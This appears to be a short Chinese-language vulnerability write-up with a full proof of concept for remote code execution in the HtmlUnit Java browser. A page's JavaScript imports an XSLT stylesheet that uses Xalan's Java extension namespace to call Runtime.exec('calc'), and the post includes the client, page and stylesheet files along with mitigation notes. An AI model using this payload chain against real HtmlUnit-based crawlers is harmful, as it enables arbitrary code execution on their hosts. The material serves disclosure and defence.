HtmlUnit 是适用于 Java 的无头浏览器(我其实觉得它不算无头浏览器,更像爬虫)。在最新版本中,用它浏览攻击者控制的网页也可以触发 RCE。
先简单放个图,后面来补
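其实真的蛮简单的,就不详细分析了,我那天只是偶尔看了下就找到了:页面里的 JavaScript 可以通过 XSLTProcessor 导入攻击者提供的样式表,而样式表声明了 Xalan 的 Java 扩展命名空间之后,转换时就能调用到 java.lang.Runtime。从防护角度看,问题看起来出在 XSLT 转换没有禁用扩展函数(例如开启 FEATURE_SECURE_PROCESSING);不需要执行脚本的场景下,也可以直接关闭 WebClient 的 JavaScript。不过最近 XSLT 好像比较火来着呢。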
Test.java
| package HtmlUnit;
import com.gargoylesoftware.htmlunit.WebClient; import com.gargoylesoftware.htmlunit.html.HtmlPage;
/**
 * Reproduction client from the write-up: fetches a single page with an HtmlUnit
 * {@link WebClient} whose options are all left untouched.
 *
 * <p>NOTE(review): nothing here restricts what the fetched page may do. As far as I know
 * HtmlUnit executes page JavaScript unless it is switched off, so for untrusted URLs where
 * scripts are not needed, {@code webClient.getOptions().setJavaScriptEnabled(false)} is the
 * setting to look at. Confirm the default for the HtmlUnit version in use.
 */
public class Test {

    /**
     * Opens the client, loads the page once, and closes the client again.
     *
     * @param args unused
     * @throws Exception whatever the page load or the client shutdown throws
     */
    public static void main(String[] args) throws Exception {
        try (WebClient browser = new WebClient()) {
            // "xxx" is the placeholder host used in the original post.
            String target = "http://xxx/htmlunit.html";
            // The returned page is never inspected; loading it is all this program does.
            HtmlPage loaded = browser.getPage(target);
        }
    }
}
|
htmlunit.html
| <script>
// Page fetched by the HtmlUnit client in Test.java. It loads an XML document and an
// XSLT stylesheet from the same location as the page and runs the transform.
// NOTE(review): the security-relevant step is the transform at the bottom; everything
// above it only fetches the two documents.

// Returns a new, empty XML document.
function createXmlDocument() {
    return document.implementation.createDocument('', '', null);
}

// Fetches `file` with XMLHttpRequest and returns the response parsed as XML.
// The third argument to open() is false, so the request is synchronous.
// `xhttp` is assigned without var/let, so it ends up as a global.
function loadXMLDocumentFromFile(file) {
    xhttp = new XMLHttpRequest();
    xhttp.open("GET", file, false);
    xhttp.send();
    return xhttp.responseXML;
}

console.log("1");

// The document created here (and its async flag) is discarded: xmlDoc is
// reassigned to the fetched document on the last statement of this line.
var xmlDoc = createXmlDocument(); xmlDoc.async = false; xmlDoc = loadXMLDocumentFromFile("1.xml");

// Same pattern for the stylesheet: only the fetched "2.xml" is actually used.
var xslDoc = createXmlDocument(); xslDoc.async = false; xslDoc = loadXMLDocumentFromFile("2.xml");

// The stylesheet is supplied by the page being visited, so its content is untrusted
// from the client's point of view.
// NOTE(review): whether extension functions in that stylesheet are honoured depends on
// how the embedding client configures its XSLT engine (confirm for the version in use).
var processor = new XSLTProcessor();
processor.importStylesheet(xslDoc);
processor.transformToDocument(xmlDoc);
</script>
|
1.xml
| <?xml version="1.0" encoding="UTF-8"?>
<!-- Input document for the transform: a single empty <s> element. -->
<s></s>
|
2.xml
| <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
  <!--
    Stylesheet from the write-up. The rt: and ob: prefixes are bound to namespaces of the
    form http://xml.apache.org/xalan/java/ followed by a class name; Xalan's Java extension
    mechanism resolves such prefixes to the named Java classes (here java.lang.Runtime and
    java.lang.Object).
    NOTE(review): for defenders, a stylesheet from an untrusted origin that declares a
    xalan/java namespace is a useful thing to reject or alert on. A TransformerFactory with
    XMLConstants.FEATURE_SECURE_PROCESSING enabled is expected to refuse these extension
    calls; confirm for the processor and version in use.
  -->
  <!-- Matches the document root, so the template applies to any input document. -->
  <xsl:template match="/">
    <!-- Calls the static method Runtime.getRuntime() through the rt: prefix. -->
    <xsl:variable name="rtobject" select="rt:getRuntime()"/>
    <!-- Calls exec on that Runtime object; 'calc' is the command used in the original post. -->
    <xsl:variable name="process" select="rt:exec($rtobject,'calc')"/>
    <!-- Converts the returned object to a string via Object.toString and writes it to the output. -->
    <xsl:variable name="processString" select="ob:toString($process)"/>
    <xsl:value-of select="$processString"/>
  </xsl:template>
</xsl:stylesheet>
|